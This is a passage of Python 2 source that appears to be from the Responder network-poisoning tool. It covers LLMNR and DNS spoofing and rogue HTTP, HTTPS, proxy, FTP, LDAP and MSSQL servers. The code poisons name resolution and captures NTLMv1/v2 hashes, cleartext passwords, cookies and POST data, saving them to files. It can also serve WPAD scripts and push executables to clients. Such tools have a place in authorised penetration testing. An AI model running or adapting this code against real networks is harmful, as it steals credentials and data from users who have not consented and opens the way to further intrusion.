data = self.request.recv(1024)
|
|
##NegoSSP
|
|
if data[0] == "\x10":
|
|
t = MSSQLNTLMChallengeAnswer(ServerChallenge=Challenge)
|
|
t.calculate()
|
|
buffer1 = str(t)
|
|
self.request.send(buffer1)
|
|
data = self.request.recv(1024)
|
|
##NegoSSP Auth
|
|
if data[0] == "\x11":
|
|
ParseSQLHash(data,self.client_address[0])
|
|
except Exception:
|
|
pass
|
|
self.request.close()
|
|
|
|
##################################################################################
|
|
#LLMNR Stuff
|
|
##################################################################################
|
|
|
|
#LLMNR Answer packet.
|
|
class LLMNRAns(Packet):
|
|
fields = OrderedDict([
|
|
("Tid", ""),
|
|
("Flags", "\x80\x00"),
|
|
("Question", "\x00\x01"),
|
|
("AnswerRRS", "\x00\x01"),
|
|
("AuthorityRRS", "\x00\x00"),
|
|
("AdditionalRRS", "\x00\x00"),
|
|
("QuestionNameLen", "\x09"),
|
|
("QuestionName", ""),
|
|
("QuestionNameNull", "\x00"),
|
|
("Type", "\x00\x01"),
|
|
("Class", "\x00\x01"),
|
|
("AnswerNameLen", "\x09"),
|
|
("AnswerName", ""),
|
|
("AnswerNameNull", "\x00"),
|
|
("Type1", "\x00\x01"),
|
|
("Class1", "\x00\x01"),
|
|
("TTL", "\x00\x00\x00\x1e"),##Poison for 30 sec.
|
|
("IPLen", "\x00\x04"),
|
|
("IP", "\x00\x00\x00\x00"),
|
|
])
|
|
|
|
def calculate(self):
|
|
self.fields["IP"] = inet_aton(OURIP)
|
|
self.fields["IPLen"] = struct.pack(">h",len(self.fields["IP"]))
|
|
self.fields["AnswerNameLen"] = struct.pack(">h",len(self.fields["AnswerName"]))[1]
|
|
self.fields["QuestionNameLen"] = struct.pack(">h",len(self.fields["QuestionName"]))[1]
|
|
|
|
def Parse_LLMNR_Name(data,addr):
|
|
NameLen = struct.unpack('>B',data[12])[0]
|
|
Name = data[13:13+NameLen]
|
|
print "LLMNR poisoned answer sent to this IP: %s. The requested name was : %s."%(addr[0],Name)
|
|
logging.warning('LLMNR poisoned answer sent to this IP: %s. The requested name was : %s.'%(addr[0],Name))
|
|
return Name
|
|
|
|
def Parse_IPV6_Addr(data):
|
|
Len = len(data)
|
|
if data[Len-4:Len][1] =="\x1c":
|
|
return False
|
|
else:
|
|
return True
|
|
|
|
def RunLLMNR():
|
|
ALL = BIND_TO_IP
|
|
MADDR = "224.0.0.252"
|
|
MPORT = 5355
|
|
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
|
|
sock.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
|
|
sock.bind((ALL,MPORT))
|
|
sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)
|
|
## Join IGMP Group.
|
|
Join = sock.setsockopt(socket.IPPROTO_IP,socket.IP_ADD_MEMBERSHIP,inet_aton(MADDR) + inet_aton(ALL))
|
|
while True:
|
|
try:
|
|
data, addr = sock.recvfrom(1024)
|
|
if RespondToSpecificHost(RespondTo):
|
|
if RespondToIPScope(RespondTo, addr[0]):
|
|
if data[2:4] == "\x00\x00":
|
|
if Parse_IPV6_Addr(data):
|
|
Name = Parse_LLMNR_Name(data,addr)
|
|
buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name)
|
|
buff.calculate()
|
|
for x in range(1):
|
|
sock.sendto(str(buff), addr)
|
|
if Is_Finger_On(Finger_On_Off):
|
|
try:
|
|
Finger = RunSmbFinger((addr[0],445))
|
|
logging.warning('[+] OsVersion is:%s'%(Finger[0]))
|
|
logging.warning('[+] ClientVersion is :%s'%(Finger[1]))
|
|
except Exception:
|
|
logging.warning('[+] Fingerprint failed for host: %s'%(addr[0]))
|
|
pass
|
|
else:
|
|
pass
|
|
else:
|
|
if data[2:4] == "\x00\x00":
|
|
if Parse_IPV6_Addr(data):
|
|
Name = Parse_LLMNR_Name(data,addr)
|
|
buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name)
|
|
buff.calculate()
|
|
for x in range(1):
|
|
sock.sendto(str(buff), addr)
|
|
if Is_Finger_On(Finger_On_Off):
|
|
try:
|
|
Finger = RunSmbFinger((addr[0],445))
|
|
logging.warning('[+] OsVersion is:%s'%(Finger[0]))
|
|
logging.warning('[+] ClientVersion is :%s'%(Finger[1]))
|
|
except Exception:
|
|
logging.warning('[+] Fingerprint failed for host: %s'%(addr[0]))
|
|
pass
|
|
except:
|
|
raise
|
|
|
|
##################################################################################
|
|
#DNS Stuff
|
|
##################################################################################
|
|
def ParseDNSType(data):
|
|
QueryTypeClass = data[len(data)-4:]
|
|
if QueryTypeClass == "\x00\x01\x00\x01":#If Type A, Class IN, then answer.
|
|
return True
|
|
else:
|
|
return False
|
|
|
|
#DNS Answer packet.
|
|
class DNSAns(Packet):
|
|
fields = OrderedDict([
|
|
("Tid", ""),
|
|
("Flags", "\x80\x10"),
|
|
("Question", "\x00\x01"),
|
|
("AnswerRRS", "\x00\x01"),
|
|
("AuthorityRRS", "\x00\x00"),
|
|
("AdditionalRRS", "\x00\x00"),
|
|
("QuestionName", ""),
|
|
("QuestionNameNull", "\x00"),
|
|
("Type", "\x00\x01"),
|
|
("Class", "\x00\x01"),
|
|
("AnswerPointer", "\xc0\x0c"),
|
|
("Type1", "\x00\x01"),
|
|
("Class1", "\x00\x01"),
|
|
("TTL", "\x00\x00\x00\x1e"), #30 secs, dont mess with their cache for too long..
|
|
("IPLen", "\x00\x04"),
|
|
("IP", "\x00\x00\x00\x00"),
|
|
])
|
|
|
|
def calculate(self,data):
|
|
self.fields["Tid"] = data[0:2]
|
|
self.fields["QuestionName"] = ''.join(data[12:].split('\x00')[:1])
|
|
self.fields["IP"] = inet_aton(OURIP)
|
|
self.fields["IPLen"] = struct.pack(">h",len(self.fields["IP"]))
|
|
|
|
# DNS Server class.
|
|
class DNS(SocketServer.BaseRequestHandler):
|
|
def server_bind(self):
|
|
self.socket.setsockopt(SOL_SOCKET, SO_REUSEADDR,SO_REUSEPORT, 1)
|
|
self.socket.bind(self.server_address)
|
|
self.socket.setblocking(0)
|
|
|
|
def handle(self):
|
|
req, soc = self.request
|
|
data = req
|
|
if ParseDNSType(data):
|
|
buff = DNSAns()
|
|
buff.calculate(data)
|
|
soc.sendto(str(buff), self.client_address)
|
|
print "DNS Answer sent to: %s "%(self.client_address[0])
|
|
logging.warning('DNS Answer sent to: %s'%(self.client_address[0]))
|
|
|
|
class DNSTCP(SocketServer.BaseRequestHandler):
|
|
def server_bind(self):
|
|
self.socket.setsockopt(SOL_SOCKET, SO_REUSEADDR,SO_REUSEPORT, 1)
|
|
self.socket.bind(self.server_address)
|
|
self.socket.setblocking(0)
|
|
|
|
def handle(self):
|
|
try:
|
|
data = self.request.recv(1024)
|
|
if ParseDNSType(data):
|
|
buff = DNSAns()
|
|
buff.calculate(data)
|
|
self.request.send(buff)
|
|
|
|
except Exception:
|
|
pass
|
|
|
|
##################################################################################
|
|
#HTTP Stuff
|
|
##################################################################################
|
|
from HTTPPackets import *
|
|
from HTTPProxy import *
|
|
|
|
#Parse NTLMv1/v2 hash.
|
|
def ParseHTTPHash(data,client):
|
|
LMhashLen = struct.unpack('<H',data[12:14])[0]
|
|
LMhashOffset = struct.unpack('<H',data[16:18])[0]
|
|
LMHash = data[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
|
|
NthashLen = struct.unpack('<H',data[20:22])[0]
|
|
NthashOffset = struct.unpack('<H',data[24:26])[0]
|
|
NTHash = data[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
|
|
if NthashLen == 24:
|
|
print "[+]HTTP NTLMv1 hash captured from :",client
|
|
logging.warning('[+]HTTP NTLMv1 hash captured from :%s'%(client))
|
|
NtHash = data[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
|
|
HostNameLen = struct.unpack('<H',data[46:48])[0]
|
|
HostNameOffset = struct.unpack('<H',data[48:50])[0]
|
|
Hostname = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
|
|
print "Hostname is :", Hostname
|
|
logging.warning('[+]HTTP NTLMv1 Hostname is :%s'%(Hostname))
|
|
UserLen = struct.unpack('<H',data[36:38])[0]
|
|
UserOffset = struct.unpack('<H',data[40:42])[0]
|
|
User = data[UserOffset:UserOffset+UserLen].replace('\x00','')
|
|
print "User is :", data[UserOffset:UserOffset+UserLen].replace('\x00','')
|
|
logging.warning('[+]HTTP NTLMv1 User is :%s'%(data[UserOffset:UserOffset+UserLen].replace('\x00','')))
|
|
outfile = "HTTP-NTLMv1-Client-"+client+".txt"
|
|
WriteHash = User+"::"+Hostname+":"+LMHash+":"+NtHash+":"+NumChal
|
|
WriteData(outfile,WriteHash, User+"::"+Hostname)
|
|
print "Complete hash is : ", WriteHash
|
|
logging.warning('[+]HTTP NTLMv1 Complete hash is :%s'%(WriteHash))
|
|
if NthashLen > 24:
|
|
print "[+]HTTP NTLMv2 hash captured from :",client
|
|
logging.warning('[+]HTTP NTLMv2 hash captured from :%s'%(client))
|
|
NthashLen = 64
|
|
DomainLen = struct.unpack('<H',data[28:30])[0]
|
|
DomainOffset = struct.unpack('<H',data[32:34])[0]
|
|
Domain = data[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
|
|
print "Domain is : ", Domain
|
|
logging.warning('[+]HTTP NTLMv2 Domain is :%s'%(Domain))
|
|
UserLen = struct.unpack('<H',data[36:38])[0]
|
|
UserOffset = struct.unpack('<H',data[40:42])[0]
|
|
User = data[UserOffset:UserOffset+UserLen].replace('\x00','')
|
|
print "User is :", User
|
|
logging.warning('[+]HTTP NTLMv2 User is : %s'%(User))
|
|
HostNameLen = struct.unpack('<H',data[44:46])[0]
|
|
HostNameOffset = struct.unpack('<H',data[48:50])[0]
|
|
HostName = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
|
|
print "Hostname is :", HostName
|
|
logging.warning('[+]HTTP NTLMv2 Hostname is :%s'%(HostName))
|
|
outfile = "HTTP-NTLMv2-Client-"+client+".txt"
|
|
WriteHash = User+"::"+Domain+":"+NumChal+":"+NTHash[:32]+":"+NTHash[32:]
|
|
WriteData(outfile,WriteHash, User+"::"+Domain)
|
|
print "Complete hash is : ", WriteHash
|
|
logging.warning('[+]HTTP NTLMv2 Complete hash is :%s'%(WriteHash))
|
|
|
|
def GrabCookie(data,host):
|
|
Cookie = re.search('(Cookie:*.\=*)[^\r\n]*', data)
|
|
if Cookie:
|
|
CookieStr = "[+]HTTP Cookie Header sent from: %s The Cookie is: \n%s"%(host,Cookie.group(0))
|
|
logging.warning(CookieStr)
|
|
print CookieStr
|
|
return Cookie.group(0)
|
|
else:
|
|
NoCookies = "[+]No cookies were sent with this request"
|
|
logging.warning(NoCookies)
|
|
return NoCookies
|
|
|
|
def ServeWPADOrNot(on_off):
|
|
if on_off == "ON":
|
|
return True
|
|
if on_off == "OFF":
|
|
return False
|
|
|
|
def WpadCustom(data,client):
|
|
if ServeWPADOrNot(WPAD_On_Off):
|
|
b = re.search('(/wpad.dat)', data)
|
|
if b:
|
|
Message = "[+]WPAD file sent to: %s"%(client)
|
|
print Message
|
|
logging.warning(Message)
|
|
buffer1 = WPADScript(Payload=WPAD_Script)
|
|
buffer1.calculate()
|
|
return str(buffer1)
|
|
else:
|
|
return False
|
|
|
|
# Function used to check if we answer with a Basic or NTLM auth.
|
|
def Basic_Ntlm(Basic):
|
|
if Basic == "ON":
|
|
return IIS_Basic_401_Ans()
|
|
if Basic == "OFF":
|
|
return IIS_Auth_401_Ans()
|
|
|
|
def ServeEXE(data,client, Filename):
|
|
Message = "[+]Sent %s file sent to: %s."%(Filename,client)
|
|
print Message
|
|
logging.warning(Message)
|
|
with open (Filename, "rb") as bk:
|
|
data = bk.read()
|
|
bk.close()
|
|
return data
|
|
|
|
def ServeEXEOrNot(on_off):
|
|
if Exe_On_Off == "ON":
|
|
return True
|
|
if Exe_On_Off == "OFF":
|
|
return False
|
|
|
|
def ServeEXECAlwaysOrNot(on_off):
|
|
if Exec_Mode_On_Off == "ON":
|
|
return True
|
|
if Exec_Mode_On_Off == "OFF":
|
|
return False
|
|
|
|
def IsExecutable(Filename):
|
|
exe = re.findall('.exe',Filename)
|
|
if exe:
|
|
return True
|
|
else:
|
|
return False
|
|
|
|
#Handle HTTP packet sequence.
|
|
def PacketSequence(data,client):
|
|
a = re.findall('(?<=Authorization: NTLM )[^\\r]*', data)
|
|
b = re.findall('(?<=Authorization: Basic )[^\\r]*', data)
|
|
if ServeEXEOrNot(Exe_On_Off) and re.findall('.exe', data):
|
|
File = config.get('HTTP Server', 'ExecFilename')
|
|
buffer1 = ServerExeFile(Payload = ServeEXE(data,client,File),filename=File)
|
|
buffer1.calculate()
|
|
return str(buffer1)
|
|
if ServeEXECAlwaysOrNot(Exec_Mode_On_Off):
|
|
if IsExecutable(FILENAME):
|
|
buffer1 = ServeAlwaysExeFile(Payload = ServeEXE(data,client,FILENAME),ContentDiFile=FILENAME)
|
|
buffer1.calculate()
|
|
return str(buffer1)
|
|
else:
|
|
buffer1 = ServeAlwaysNormalFile(Payload = ServeEXE(data,client,FILENAME))
|
|
buffer1.calculate()
|
|
return str(buffer1)
|
|
if a:
|
|
packetNtlm = b64decode(''.join(a))[8:9]
|
|
if packetNtlm == "\x01":
|
|
GrabCookie(data,client)
|
|
r = NTLM_Challenge(ServerChallenge=Challenge)
|
|
r.calculate()
|
|
t = IIS_NTLM_Challenge_Ans()
|
|
t.calculate(str(r))
|
|
buffer1 = str(t)
|
|
return buffer1
|
|
if packetNtlm == "\x03":
|
|
NTLM_Auth= b64decode(''.join(a))
|
|
ParseHTTPHash(NTLM_Auth,client)
|
|
buffer1 = IIS_Auth_Granted(Payload=config.get('HTTP Server','HTMLToServe'))
|
|
buffer1.calculate()
|
|
return str(buffer1)
|
|
if b:
|
|
GrabCookie(data,client)
|
|
outfile = "HTTP-Clear-Text-Password-"+client+".txt"
|
|
WriteData(outfile,b64decode(''.join(b)), b64decode(''.join(b)))
|
|
print "[+]HTTP-User & Password:", b64decode(''.join(b))
|
|
logging.warning('[+]HTTP-User & Password: %s'%(b64decode(''.join(b))))
|
|
buffer1 = IIS_Auth_Granted(Payload=config.get('HTTP Server','HTMLToServe'))
|
|
buffer1.calculate()
|
|
return str(buffer1)
|
|
|
|
else:
|
|
return str(Basic_Ntlm(Basic))
|
|
|
|
#HTTP Server Class
|
|
class HTTP(SocketServer.BaseRequestHandler):
|
|
def server_bind(self):
|
|
self.socket.setsockopt(SOL_SOCKET, SO_REUSEADDR,SO_REUSEPORT, 1)
|
|
self.socket.bind(self.server_address)
|
|
self.socket.setblocking(0)
|
|
|
|
def handle(self):
|
|
try:
|
|
while True:
|
|
self.request.settimeout(0.1)
|
|
data = self.request.recv(8092)
|
|
buff = WpadCustom(data,self.client_address[0])
|
|
if buff:
|
|
self.request.send(buff)
|
|
else:
|
|
buffer0 = PacketSequence(data,self.client_address[0])
|
|
self.request.sendall(buffer0)
|
|
except Exception:
|
|
pass#No need to be verbose..
|
|
self.request.close()
|
|
|
|
##################################################################################
|
|
#HTTP Proxy Stuff
|
|
##################################################################################
|
|
|
|
def GrabHost(data,host):
|
|
GET = re.findall('(?<=GET )[^HTTP]*', data)
|
|
CONNECT = re.findall('(?<=CONNECT )[^HTTP]*', data)
|
|
POST = re.findall('(?<=POST )[^HTTP]*', data)
|
|
POSTDATA = re.findall('(?<=\r\n\r\n)[^*]*', data)
|
|
if GET:
|
|
HostStr = "[+]HTTP Proxy sent from: %s The requested URL was: %s"%(host,''.join(GET))
|
|
logging.warning(HostStr)
|
|
print HostStr
|
|
return ''.join(GET),None
|
|
if CONNECT:
|
|
Host2Str = "[+]HTTP Proxy sent from: %s The requested URL was: %s"%(host,''.join(CONNECT))
|
|
logging.warning(Host2Str)
|
|
print Host2Str
|
|
return ''.join(CONNECT), None
|
|
if POST:
|
|
Host3Str = "[+]HTTP Proxy sent from: %s The requested URL was: %s"%(host,''.join(POST))
|
|
logging.warning(Host3Str)
|
|
print Host3Str
|
|
if POSTDATA:
|
|
print '[+]HTTP Proxy POST DATA in this request was:',''.join(POSTDATA)
|
|
return ''.join(POST), ''.join(POSTDATA)
|
|
else:
|
|
NoHost = "[+]No host url sent with this request"
|
|
logging.warning(NoHost)
|
|
return "NO HOST", None
|
|
|
|
def HostDidntAuthBefore(client):
|
|
f = os.path.exists("HTTP-NTLMv2-Client-"+client+".txt")
|
|
if f:
|
|
return False
|
|
else:
|
|
return True
|
|
|
|
def ProxyBasic_Ntlm(Basic):
|
|
if Basic == "ON":
|
|
return IIS_Basic_407_Ans()
|
|
if Basic == "OFF":
|
|
return IIS_Auth_407_Ans()
|
|
|
|
def ParseDomain(data,client):
|
|
Host,PostData = GrabHost(data,client)
|
|
Cookie = GrabCookie(data,client)
|
|
Message = "Requested URL: %s\nComplete Cookie: %s\nClient IP is: %s\nPOST DATA: %s"%(Host, Cookie, client,PostData)
|
|
DomainName = re.search('^(.*:)//([a-z\-.]+)(:[0-9]+)?(.*)$', Host)
|
|
if DomainName:
|
|
OutFile = "HTTPCookies/HTTP-Cookie-"+DomainName.group(2)+"-"+client+".txt"
|
|
WriteData(OutFile,Message, Message)
|
|
else:
|
|
OutFile = "HTTPCookies/HTTP-Cookie-"+Host.replace('/','')+"-"+client+".txt"
|
|
WriteData(OutFile,Message, Message)
|
|
|
|
#Handle HTTP packet sequence.
|
|
def ProxyPacketSequence(data,client):
|
|
a = re.findall('(?<=Proxy-Authorization: NTLM )[^\\r]*', data)
|
|
b = re.findall('(?<=Authorization: Basic )[^\\r]*', data)
|
|
if ServeEXEOrNot(Exe_On_Off) and re.findall('.exe', data):
|
|
File = config.get('HTTP Server', 'ExecFilename')
|
|
buffer1 = ServerExeFile(Payload = ServeEXE(data,client,File),filename=File)
|
|
buffer1.calculate()
|
|
return str(buffer1)
|
|
if ServeEXECAlwaysOrNot(Exec_Mode_On_Off):
|
|
if IsExecutable(FILENAME):
|
|
buffer1 = ServeAlwaysExeFile(Payload = ServeEXE(data,client,FILENAME),ContentDiFile=FILENAME)
|
|
buffer1.calculate()
|
|
return str(buffer1)
|
|
else:
|
|
buffer1 = ServeAlwaysNormalFile(Payload = ServeEXE(data,client,FILENAME))
|
|
buffer1.calculate()
|
|
return str(buffer1)
|
|
if a:
|
|
packetNtlm = b64decode(''.join(a))[8:9]
|
|
if packetNtlm == "\x01":
|
|
r = NTLM_Challenge(ServerChallenge=Challenge)
|
|
r.calculate()
|
|
t = IIS_407_NTLM_Challenge_Ans()
|
|
t.calculate(str(r))
|
|
buffer1 = str(t)
|
|
return buffer1
|
|
if packetNtlm == "\x03":
|
|
NTLM_Auth= b64decode(''.join(a))
|
|
ParseHTTPHash(NTLM_Auth,client)
|
|
buffer1 = DitchThisConnection()
|
|
buffer1.calculate()
|
|
return str(buffer1)
|
|
if b:
|
|
outfile = "HTTP-Proxy-Clear-Text-Password-"+client+".txt"
|
|
WriteData(outfile,b64decode(''.join(b)),b64decode(''.join(b)))
|
|
print "[+][Proxy]HTTP-User & Password:", b64decode(''.join(b))
|
|
logging.warning('[+][Proxy]HTTP-User & Password: %s'%(b64decode(''.join(b))))
|
|
buffer1 = DitchThisConnection()
|
|
buffer1.calculate()
|
|
return str(buffer1)
|
|
else:
|
|
return str(ProxyBasic_Ntlm(Basic))
|
|
|
|
#HTTP Rogue Proxy Server Class
|
|
class HTTPProxy(SocketServer.BaseRequestHandler):
|
|
def server_bind(self):
|
|
self.socket.setsockopt(SOL_SOCKET, SO_REUSEADDR,SO_REUSEPORT, 1)
|
|
self.socket.bind(self.server_address)
|
|
self.socket.setblocking(0)
|
|
|
|
def handle(self):
|
|
try:
|
|
self.request.settimeout(0.1)
|
|
for x in range(2):
|
|
data = self.request.recv(8092)
|
|
ParseDomain(data,self.client_address[0])
|
|
buffer0 = ProxyPacketSequence(data,self.client_address[0])
|
|
self.request.sendall(buffer0)
|
|
|
|
except Exception:
|
|
pass#No need to be verbose..
|
|
self.request.close()
|
|
|
|
##################################################################################
|
|
#HTTPS Server
|
|
##################################################################################
|
|
from OpenSSL import SSL
|
|
#Parse NTLMv1/v2 hash.
|
|
def ParseHTTPSHash(data,client):
|
|
LMhashLen = struct.unpack('<H',data[12:14])[0]
|
|
LMhashOffset = struct.unpack('<H',data[16:18])[0]
|
|
LMHash = data[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
|
|
NthashLen = struct.unpack('<H',data[20:22])[0]
|
|
NthashOffset = struct.unpack('<H',data[24:26])[0]
|
|
NTHash = data[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
|
|
if NthashLen == 24:
|
|
print "[+]HTTPS NTLMv1 hash captured from :",client
|
|
logging.warning('[+]HTTPS NTLMv1 hash captured from :%s'%(client))
|
|
NtHash = data[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
|
|
HostNameLen = struct.unpack('<H',data[46:48])[0]
|
|
HostNameOffset = struct.unpack('<H',data[48:50])[0]
|
|
Hostname = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
|
|
print "Hostname is :", Hostname
|
|
logging.warning('[+]HTTPS NTLMv1 Hostname is :%s'%(Hostname))
|
|
UserLen = struct.unpack('<H',data[36:38])[0]
|
|
UserOffset = struct.unpack('<H',data[40:42])[0]
|
|
User = data[UserOffset:UserOffset+UserLen].replace('\x00','')
|
|
print "User is :", data[UserOffset:UserOffset+UserLen].replace('\x00','')
|
|
logging.warning('[+]HTTPS NTLMv1 User is :%s'%(data[UserOffset:UserOffset+UserLen].replace('\x00','')))
|
|
outfile = "HTTPS-NTLMv1-Client-"+client+".txt"
|
|
WriteHash = User+"::"+Hostname+":"+LMHash+":"+NtHash+":"+NumChal
|
|
WriteData(outfile,WriteHash, User+"::"+Hostname)
|
|
print "Complete hash is : ", WriteHash
|
|
logging.warning('[+]HTTPS NTLMv1 Complete hash is :%s'%(WriteHash))
|
|
if NthashLen > 24:
|
|
print "[+]HTTPS NTLMv2 hash captured from :",client
|
|
logging.warning('[+]HTTPS NTLMv2 hash captured from :%s'%(client))
|
|
NthashLen = 64
|
|
DomainLen = struct.unpack('<H',data[28:30])[0]
|
|
DomainOffset = struct.unpack('<H',data[32:34])[0]
|
|
Domain = data[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
|
|
print "Domain is : ", Domain
|
|
logging.warning('[+]HTTPS NTLMv2 Domain is :%s'%(Domain))
|
|
UserLen = struct.unpack('<H',data[36:38])[0]
|
|
UserOffset = struct.unpack('<H',data[40:42])[0]
|
|
User = data[UserOffset:UserOffset+UserLen].replace('\x00','')
|
|
print "User is :", User
|
|
logging.warning('[+]HTTPS NTLMv2 User is : %s'%(User))
|
|
HostNameLen = struct.unpack('<H',data[44:46])[0]
|
|
HostNameOffset = struct.unpack('<H',data[48:50])[0]
|
|
HostName = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
|
|
print "Hostname is :", HostName
|
|
logging.warning('[+]HTTPS NTLMv2 Hostname is :%s'%(HostName))
|
|
outfile = "HTTPS-NTLMv2-Client-"+client+".txt"
|
|
WriteHash = User+"::"+Domain+":"+NumChal+":"+NTHash[:32]+":"+NTHash[32:]
|
|
WriteData(outfile,WriteHash, User+"::"+Domain)
|
|
print "Complete hash is : ", WriteHash
|
|
logging.warning('[+]HTTPS NTLMv2 Complete hash is :%s'%(WriteHash))
|
|
|
|
#Handle HTTPS packet sequence.
|
|
def HTTPSPacketSequence(data,client):
|
|
a = re.findall('(?<=Authorization: NTLM )[^\\r]*', data)
|
|
b = re.findall('(?<=Authorization: Basic )[^\\r]*', data)
|
|
if a:
|
|
packetNtlm = b64decode(''.join(a))[8:9]
|
|
if packetNtlm == "\x01":
|
|
GrabCookie(data,client)
|
|
r = NTLM_Challenge(ServerChallenge=Challenge)
|
|
r.calculate()
|
|
t = IIS_NTLM_Challenge_Ans()
|
|
t.calculate(str(r))
|
|
buffer1 = str(t)
|
|
return buffer1
|
|
if packetNtlm == "\x03":
|
|
NTLM_Auth= b64decode(''.join(a))
|
|
ParseHTTPSHash(NTLM_Auth,client)
|
|
buffer1 = str(IIS_Auth_Granted(Payload=config.get('HTTP Server','HTMLToServe')))
|
|
return buffer1
|
|
if b:
|
|
GrabCookie(data,client)
|
|
outfile = "HTTPS-Clear-Text-Password-"+client+".txt"
|
|
WriteData(outfile,b64decode(''.join(b)), b64decode(''.join(b)))
|
|
print "[+]HTTPS-User & Password:", b64decode(''.join(b))
|
|
logging.warning('[+]HTTPS-User & Password: %s'%(b64decode(''.join(b))))
|
|
buffer1 = str(IIS_Auth_Granted(Payload=config.get('HTTP Server','HTMLToServe')))
|
|
return buffer1
|
|
|
|
else:
|
|
return str(Basic_Ntlm(Basic))
|
|
|
|
class SSlSock(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
|
|
def __init__(self, server_address, RequestHandlerClass):
|
|
SocketServer.BaseServer.__init__(self, server_address, RequestHandlerClass)
|
|
ctx = SSL.Context(SSL.SSLv3_METHOD)
|
|
cert = config.get('HTTPS Server', 'cert')
|
|
key = config.get('HTTPS Server', 'key')
|
|
ctx.use_privatekey_file(key)
|
|
ctx.use_certificate_file(cert)
|
|
self.socket = SSL.Connection(ctx, socket.socket(self.address_family, self.socket_type))
|
|
self.server_bind()
|
|
self.server_activate()
|
|
|
|
def shutdown_request(self,request):
|
|
try:
|
|
request.shutdown()
|
|
except:
|
|
pass
|
|
|
|
class DoSSL(SocketServer.StreamRequestHandler):
|
|
def setup(self):
|
|
self.exchange = self.request
|
|
self.rfile = socket._fileobject(self.request, "rb", self.rbufsize)
|
|
self.wfile = socket._fileobject(self.request, "wb", self.wbufsize)
|
|
|
|
def handle(self):
|
|
try:
|
|
while True:
|
|
data = self.exchange.recv(8092)
|
|
self.exchange.settimeout(0.5)
|
|
buff = WpadCustom(data,self.client_address[0])
|
|
if buff:
|
|
self.exchange.send(buff)
|
|
else:
|
|
buffer0 = HTTPSPacketSequence(data,self.client_address[0])
|
|
self.exchange.send(buffer0)
|
|
except:
|
|
pass
|
|
|
|
##################################################################################
|
|
#FTP Stuff
|
|
##################################################################################
|
|
class FTPPacket(Packet):
|
|
fields = OrderedDict([
|
|
("Code", "220"),
|
|
("Separator", "\x20"),
|
|
("Message", "Welcome"),
|
|
("Terminator", "\x0d\x0a"),
|
|
])
|
|
|
|
#FTP server class.
|
|
class FTP(SocketServer.BaseRequestHandler):
|
|
def server_bind(self):
|
|
self.socket.setsockopt(SOL_SOCKET, SO_REUSEADDR,SO_REUSEPORT, 1)
|
|
self.socket.bind(self.server_address)
|
|
self.socket.setblocking(0)
|
|
self.socket.setdefaulttimeout(1)
|
|
|
|
def handle(self):
|
|
try:
|
|
self.request.send(str(FTPPacket()))
|
|
data = self.request.recv(1024)
|
|
if data[0:4] == "USER":
|
|
User = data[5:].replace("\r\n","")
|
|
print "[+]FTP User: ", User
|
|
logging.warning('[+]FTP User: %s'%(User))
|
|
t = FTPPacket(Code="331",Message="User name okay, need password.")
|
|
self.request.send(str(t))
|
|
data = self.request.recv(1024)
|
|
if data[0:4] == "PASS":
|
|
Pass = data[5:].replace("\r\n","")
|
|
Outfile = "FTP-Clear-Text-Password-"+self.client_address[0]+".txt"
|
|
WriteData(Outfile,User+":"+Pass, User+":"+Pass)
|
|
print "[+]FTP Password is: ", Pass
|
|
logging.warning('[+]FTP Password is: %s'%(Pass))
|
|
t = FTPPacket(Code="530",Message="User not logged in.")
|
|
self.request.send(str(t))
|
|
data = self.request.recv(1024)
|
|
else :
|
|
t = FTPPacket(Code="502",Message="Command not implemented.")
|
|
self.request.send(str(t))
|
|
data = self.request.recv(1024)
|
|
except Exception:
|
|
pass
|
|
|
|
##################################################################################
|
|
#LDAP Stuff
|
|
##################################################################################
|
|
from LDAPPackets import *
|
|
|
|
def ParseSearch(data):
|
|
Search1 = re.search('(objectClass)', data)
|
|
Search2 = re.search('(?i)(objectClass0*.*supportedCapabilities)', data)
|
|
Search3 = re.search('(?i)(objectClass0*.*supportedSASLMechanisms)', data)
|
|
if Search1:
|
|
return str(LDAPSearchDefaultPacket(MessageIDASNStr=data[8:9]))
|
|
if Search2:
|
|
return str(LDAPSearchSupportedCapabilitiesPacket(MessageIDASNStr=data[8:9],MessageIDASN2Str=data[8:9]))
|
|
if Search3:
|
|
return str(LDAPSearchSupportedMechanismsPacket(MessageIDASNStr=data[8:9],MessageIDASN2Str=data[8:9]))
|
|
|
|
def ParseLDAPHash(data,client):
|
|
SSPIStarts = data[42:]
|
|
LMhashLen = struct.unpack('<H',data[54:56])[0]
|
|
if LMhashLen > 10:
|
|
LMhashOffset = struct.unpack('<H',data[58:60])[0]
|
|
LMHash = SSPIStarts[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
|
|
NthashLen = struct.unpack('<H',data[64:66])[0]
|
|
NthashOffset = struct.unpack('<H',data[66:68])[0]
|
|
NtHash = SSPIStarts[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
|
|
DomainLen = struct.unpack('<H',data[72:74])[0]
|
|
DomainOffset = struct.unpack('<H',data[74:76])[0]
|
|
Domain = SSPIStarts[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
|
|
UserLen = struct.unpack('<H',data[80:82])[0]
|
|
UserOffset = struct.unpack('<H',data[82:84])[0]
|
|
User = SSPIStarts[UserOffset:UserOffset+UserLen].replace('\x00','')
|
|
writehash = User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal
|
|
Outfile = "LDAP-NTLMv1-"+client+".txt"
|
|
WriteData(Outfile,writehash,User+"::"+Domain)
|
|
print "[LDAP] NTLMv1 complete hash is :", writehash
|
|
